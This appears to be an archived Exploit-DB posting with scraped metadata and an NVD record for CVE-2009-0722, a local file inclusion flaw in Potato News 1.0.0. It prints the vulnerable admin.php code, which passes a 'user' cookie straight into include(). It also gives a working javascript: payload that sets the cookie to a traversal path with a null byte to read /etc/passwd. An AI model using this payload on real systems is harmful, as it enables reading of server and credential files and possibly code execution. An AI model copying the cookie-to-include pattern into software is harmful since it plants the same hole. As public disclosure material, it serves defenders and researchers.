ID EDB-ID:8032
Type exploitdb
Reporter x0r
Modified 2009-02-10T00:00:00
Description
Potato News 1.0.0 (user) Local File Inclusion Vulnerability. CVE-2009-0722. Webapps exploit for php platform
#########################################################################################
[0x01] Informations:
Name : Potato News 1.0.0
Download :
http://potato-news.googlecode.com/files/potatonews-1.0.0.zip
Vulnerability : LFI
Author : x0r
Contact : andry2000@hotmail.it
Notes : Proud to be Italian
#########################################################################################
[0x02] Bug:
Bugged file is /[path]/admin.php
[Code]
<?PHP
if (isset($_COOKIE["user"])) {
$id = $_COOKIE["user"];
if (file_exists("data/users/$id.php")) {
include ("data/users/$id.php");
if ($usaavatar == "") {
echo "<img height='75px' width='75px' src='images/noav.jpg'/>";
} else {
echo "<img height='75px' width='75px' src='$usaavatar'/>";
}
}
[/code]
#########################################################################################
[0x03] Exploit:
Exploit: javascript:document.cookie =
"user=../../../../../../../../../../etc/passwd%00; path=/"
########################################################################################
# milw0rm.com [2009-02-10]
{"id": "EDB-ID:8032", "hash": "5db3d76f9932bf3606f3243138aadb4f", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Potato News 1.0.0 user Local File Inclusion Vulnerability", "description": "Potato News 1.0.0 (user) Local File Inclusion Vulnerability. CVE-2009-0722. Webapps exploit for php platform", "published": "2009-02-10T00:00:00", "modified": "2009-02-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/8032/", "reporter": "x0r", "references": [], "cvelist": ["CVE-2009-0722"], "lastseen": "2016-02-01T04:36:02", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2016-02-01T04:36:02"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0722"]}], "modified": "2016-02-01T04:36:02"}, "vulnersScore": 6.7}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/8032/", "sourceData": "#########################################################################################\n[0x01] Informations:\n\nName : Potato News 1.0.0\nDownload :\nhttp://potato-news.googlecode.com/files/potatonews-1.0.0.zip\nVulnerability : LFI\nAuthor : x0r\nContact : andry2000@hotmail.it\nNotes : Proud to be Italian\n#########################################################################################\n[0x02] Bug:\n\nBugged file is /[path]/admin.php\n\n[Code]\n\t<?PHP\nif (isset($_COOKIE[\"user\"])) {\n$id = $_COOKIE[\"user\"];\nif (file_exists(\"data/users/$id.php\")) {\ninclude (\"data/users/$id.php\");\nif ($usaavatar == \"\") {\necho \"<img height='75px' width='75px' src='images/noav.jpg'/>\";\n\n} else {\necho \"<img height='75px' width='75px' src='$usaavatar'/>\";\n}\n}\n[/code]\n\n#########################################################################################\n[0x03] Exploit:\n\nExploit: javascript:document.cookie =\n\"user=../../../../../../../../../../etc/passwd%00; path=/\"\n\n########################################################################################\n\n# milw0rm.com [2009-02-10]\n", "osvdbidlist": ["52258"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:57", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in admin.php in Potato News 1.0.0 allows remote attackers to include and execute arbitrary files via a .. (dot dot) in the user cookie parameter.", "modified": "2017-09-29T01:33:00", "id": "CVE-2009-0722", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0722", "published": "2009-02-24T18:30:00", "title": "CVE-2009-0722", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
